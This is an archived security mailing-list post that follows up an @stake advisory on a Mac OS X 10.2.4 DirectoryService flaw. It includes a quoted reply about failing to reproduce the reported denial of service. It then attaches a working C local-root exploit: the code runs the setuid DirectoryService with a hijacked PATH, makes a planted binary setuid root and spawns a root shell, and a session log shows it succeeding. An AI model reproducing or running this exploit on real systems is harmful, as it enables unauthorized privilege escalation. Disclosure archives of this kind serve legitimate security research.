| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: neeko at haackey.com (Neeko Oni)
Subject: OS X DirectoryService DoS {@...ke adv:
Hoping to encourage people to figure out what @stake was talking about
in regards to the OS X DirectoryService DoS, I've attached a local
exploit for DirectoryService _once is has been crashed/killed_.
[sera:~] loser% gcc osxds.c -o touch
[sera:~] loser% ./touch
Original path: /bin:/sbin:/usr/bin:/usr/sbin
New path: .
Executing DirectoryService with false PATH...
Forked DirectoryService, pausing before shell exec...
sh: rm: command not found
Cross your fingers.
Path restored: /bin:/sbin:/usr/bin:/usr/sbin
euid is root.
root:~# id
uid=0(root) gid=20(staff) groups=20(staff)
root:~#
>
> Neeko Oni wrote:
>
> >Ok, the PATH problem is self-explanatory (and has been exploited once
> the DirectoryService process has crashed) but I've had some difficulty
> >reproducing the DoS attack claim. I've got a 10.2.4 machine sitting
> >right next to me, I believe it's a stock install, but DirectoryService
> >doesn't bind 625. DirectoryService doesn't bind any ports and
> >furthermore nothing binds 625 at all.
> >
> >Has anyone reproduced the DoS in that advisory?
>
> I also read the advisory and of the two MacOS machines that I am able
> to access (only one locally) I can confirm that on the machine that
> I don't have local access there was a daemon running on port 625 and
> as the advisory states I was able to reproduce the DoS attack. I'm
> not sure exactly which version of MacOS X that machine was running
> but the daemon did crash and and refuse connection.
>
> On the machine that I know for a fact is 10.2.4 and have local access to,
> DirectoryService was setuid root and was running but there was no port
> 625 open. I haven't port scanned the machine to check other ports yet
> so i'm not ruling out the possibility its running on a different port
> just yet.
>
> Has anyone else looked into this matter... ?
>
> -subversive
> --
> ______________________________________________
> http://www.linuxmail.org/
> Now with e-mail forwarding for only US$5.95/yr
>
> Powered by Outblaze
>
-------------- next part --------------
/*
OS X <= 10.2.4 DirectoryService local root PATH exploit
DirectoryService must be crashed prior to execution, per
@stake advisory. If you discover how to crash DirectoryService
e-mail me at neeko@...ckey.com [Neeko Oni]
[Copying and pasting code does not make you cool, no matter how many
dollars per hour you make. Sorry.]
--
Assuming DirectoryService has been crashed/killed, compile
this code as 'touch' (gcc osxds.c -o touch) and execute.
bash$ ./touch
*bunch of stuff here*
euid is root.
bash#
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
int
main(int argc, char **argv)
{
char *ORIGPATH;
int temp;
if (argc < 2) {
if (geteuid() == 0) {
printf("euid is root.\n");
setuid(0);
execl("/bin/bash", "bash", NULL);
}
strcpy(ORIGPATH, getenv("PATH"));
printf("Original path: %s\n", ORIGPATH);
setenv("PATH", ".", 1);
printf("New path: %s\n", getenv("PATH"));
printf("Executing DirectoryService with false PATH...\n");
if (fork() == 0) {
execl("/usr/sbin/DirectoryService", "DirectoryService", NULL);
}
printf("Forked DirectoryService, pausing before shell exec...\n");
sleep(3);
printf("Cross your fingers.\n");
setenv("PATH", ORIGPATH, 1);
printf("Path restored: %s\n", getenv("PATH"));
execl("./touch", "touch", NULL);
}
system("/usr/sbin/chown root ./touch;/bin/chmod +s ./touch");
}
Powered by blists - more mailing lists